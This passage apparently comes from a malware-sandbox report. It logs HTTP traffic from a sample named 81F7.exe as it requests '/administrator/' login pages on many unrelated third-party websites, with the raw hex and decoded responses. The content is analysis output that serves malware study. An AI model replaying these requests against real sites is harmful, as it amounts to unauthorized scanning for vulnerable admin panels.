6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:10.322932005 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:10.322978973 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:10.322994947 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:10.323029041 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:10.323045969 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:10.323112011 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:10.323117971 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:10.323152065 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:10.323216915 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:10.414040089 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	52098	13.248.169.48	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630465031 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.727273941 CET	228	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:06.931623936 CET	228	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:09.651693106 CET	400	OUT	GET /administrator/index.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=forwarder; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://acidvision.com/administrator/
Feb 21, 2024 00:26:09.768045902 CET	237	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://acidvision.com/administrator/index.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	52100	185.230.63.186	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630655050 CET	179	OUT	GET /administrator/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.747440100 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471566.669147837444212275 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqymrWSBpMfJbY0ZWU2hO35/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalo4uW0YfxzzZunGxT0metW6vFvMZn7F5/ZUT8aUqbCCUBztIiQkGLZ43mpHFKVi5CA==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,U0wL3gqDJ/Qt5QAiUjcF4fltqGzoE7zGhVYpbvgHA/E=,/j+AjfLiOiE0Vc9NsP8sK2YSzioqrjKAdIzrANrtYN35JbWzKw0R8+RcLSxYblksOBRpe0xtfquPZAaCoiHmnw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 eb c4 49 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 67 ce 0f 18 7e e8 36 23 1a 33 73 2e 9b 26 8f 16 6a 79 ed 9c 75 bf cb 39 f8 f7 4d 13 d1 03 90 e5 25 be cf 6a 08 92 19 59 43 1e dd 2b 58 34 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc ab 02 78 77 38 52 46 05 25 35 f7 85 d4 90 a7 47 ac 96 4b 55 b7 f5 7f 84 d6 83 eb 4e 72 8a 2f 8c 45 7d 6b 45 45 25 9d 07 14 dc 86 19 3f db ba a8 42 68 38 7c 6d d5 7d 1e fd c5 3f be e7 57 b6 6e 64 50 28 61 cb 9c 9b eb 1c ca 39 f4 7c 41 05 0d 04 72 aa 4c 99 47 71 83 f0 be 74 c4 98 fd c3 82 93 c6 6b 19 f0 71 26 3a ea 63 b8 25 f8 c2 a9 26 28 6b b6 54 6c d9 b4 87 57 76 b8 9c 9d da e0 b7 e4 1a 8b 56 c2 f2 88 19 3b b3 5a db 45 cf b2 09 28 85 2e d3 ca dc 31 0a 6a 1e a9 1a e1 88 c6 cc 23 56 39 98 e5 91 10 8b c5 22 c1 58 26 85 ad c5 4c 62 48 ac 49 f0 2b 62 0e 74 1e f9 0a 43 57 b4 81 11 7d 47 78 2f 7a 2d c9 07 74 6d 91 34 d2 49 1f ac 43 4d 9d 50 8c 1b 05 da 8b 50 29 57 72 bc 0e 2b 31 c3 5c f0 e2 57 d0 f7 80 3c b2 3b 7f 90 05 72 78 c4 d7 ab 0e 2b 0d be 02 c0 d4 e9 ad 0f b0 0c a2 7b 20 3a b7 6f c1 ec 2d d9 e1 7b ae 69 e8 00 de b4 53 ad 0a 91 26 93 f4 3c 39 16 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 0f f5 67 a2 cf fc 6c 6a cb 15 d3 d2 cc f3 08 30 fe 98 Data Ascii: 444Vo6_E-I&0l((Z:[L(R%F}w9ql7c!q~ypXj}g~6#3s.&jyu9M%jYC+X40XP%xw8RF%5GKUNr/E}kEE%?Bh8\|m}?WndP(a9\|ArLGqtkq&:c%&(kTlWvV;ZE(.1j#V9"X&LbHI+btCW}Gx/z-tm4ICMPP)Wr+1\W<;rx+{ :o-{iS&<9S/r$Hglj0
Feb 21, 2024 00:26:06.747447968 CET	628	IN	Data Raw: 46 94 f4 0e 43 03 2e 8f 36 f5 72 b5 21 32 e9 59 a7 82 ca e8 2a 38 8d c1 d5 d2 7b e4 df 28 a6 7a eb 65 f5 37 df 62 0f 28 b6 94 6e c5 a7 b2 b8 9b 3b db 9a 32 be 60 ca ff b9 be f8 79 43 ff 8e b6 92 a7 3e a9 19 d3 81 dd 5c b3 f3 cf 48 e9 b3 94 79 57 Data Ascii: FC.6r!2Y*8{(ze7b(n;2`yC>\HyWP:'W$E?ILrD/{Gdn\lhB_[p+tzS2?)s\0(`(9Ng.#Q2:IhTYR?>^M8'F}]T-w-a
Feb 21, 2024 00:26:06.747832060 CET	236	OUT	GET /administrator/index.php HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://touktoukcie.com/administrator/
Feb 21, 2024 00:26:06.863204956 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471566.784147837444222275 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLqymrWSBpMfJbY0ZWU2hO35/HubKAh1QhTB6OuUXtTGV,2d58ifebGbosy5xc+FRalsTwqU4RI6WEQskWAgsLHFCe3/SScY6ACT7u6aWaxtKZPDFB/0chFXzBP0oLY++gmA==,2UNV7KOq4oGjA5+PKsX47HNYW5FMKOqazjq32++LUUhYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,esXX8rTfzq2RRUC1xyAPv6D492b3qqr7SqQvqDE7ViE=,/j+AjfLiOiE0Vc9NsP8sK5C483KhHL0nZ8WejdH6PvV3rMRpwhuqafklhVFdC7d9sdHr4zo+FezP22KH3yZA0A== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 91 eb d4 6e 26 05 e8 b2 14 cb cb 30 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff 7d 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 71 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 81 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 e5 9c 75 bf cb 05 f8 f7 4d 13 d1 03 90 e5 05 be cf 6a 08 92 19 59 43 1e dd 29 58 36 d6 85 88 15 d6 04 30 81 58 cb 50 e5 25 dc a9 02 78 77 38 51 46 05 25 35 f7 85 d4 90 a7 27 ac 96 2b 55 b7 f5 7f 84 d6 83 eb 4e 72 86 2f 8c 45 7d 1b 45 45 25 9d 07 14 dc 86 39 9f ee 5c 54 21 34 1c be b6 ea 2e 8f fe e2 1f df f3 4b 5b 37 32 28 94 b0 63 ce f5 55 0e e5 02 7a be a0 82 06 02 39 53 a6 cc a3 b8 41 78 5f 3a 62 cc fe 61 c1 49 e3 b5 0c f8 38 13 1d f5 21 dc 12 7c e1 54 13 94 35 3b 2a 76 6c 3a c0 2b 7b 5c ce ce 6c f0 3b 72 8d 45 2b 61 75 c2 8c 9d 5b ad ed b2 67 d9 06 94 42 97 69 65 6e 19 05 35 8f 54 8d 70 44 63 16 11 ab 1c cc f3 48 88 e5 72 99 60 2c 93 c2 d6 62 2e 31 24 d6 24 f8 15 31 07 3a 8f 7c 85 a1 2b da c0 88 be 27 bc 17 bd 91 e4 03 ba b6 48 1a e9 a4 0f d6 a1 a6 4e 28 c6 8d 02 ed 45 a8 94 2b 39 5e 87 b5 98 63 2e 78 f1 2b e8 3b 40 1e d9 9d 3f c8 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d5 34 74 00 6f da 99 56 85 48 93 49 fa 2e 39 15 be 53 2f 80 72 1c 8d c6 24 1f 48 9d 89 f7 f5 67 a2 cf fc 6c 66 cb 35 d3 d2 2c f2 08 30 fe 98 Data Ascii: 442Vo6_E-n&0l((Z:[L(R%F}w9ql7c1q~qtXj}g~6#3.&juuMjYC)X60XP%xw8QF%5'+UNr/E}EE%9\T!4.K[72(cUz9SAx_:baI8!\|T5;*vl:+{\l;rE+au[gBien5TpDcHr`,b.1$$1:\|+'HN(E+9^c.x+;@?9<U_`X=w`=4toVHI.9S/r$Hglf5,0
Feb 21, 2024 00:26:06.863226891 CET	626	IN	Data Raw: 46 94 f4 0e 43 03 2e 8f b6 f5 72 b9 25 32 e9 59 a7 82 ca e8 32 38 8d c1 d5 d2 7b e4 df 2a a6 7a eb 65 f5 37 df 62 0f 28 b6 94 6e cd 67 b2 b8 5d 38 db 9a 32 3e 67 ca ff b9 b9 f8 79 4b ff 8e b6 92 a7 3e a9 39 d3 81 5d 5f b1 77 9f 91 d2 67 29 f3 ae Data Ascii: FC.r%2Y28{*ze7b(ng]82>gyK>9]_wg)$8$tT-FI~Z=^y#W(%V3/n4dS#`DS\|Qr?+8v-yC1]Z-Gd4IiTlrmRtrK}\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	52095	20.75.101.58	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630846024 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.733607054 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>
Feb 21, 2024 00:26:12.206059933 CET	183	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.308996916 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	52092	208.109.43.169	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630851030 CET	182	OUT	GET /administrator/ HTTP/1.1 Host: waukesha-water.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.786940098 CET	455	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Server: Apache Location: https://waukesha-water.com/administrator/ Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 75 6b 65 73 68 61 2d 77 61 74 65 72 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 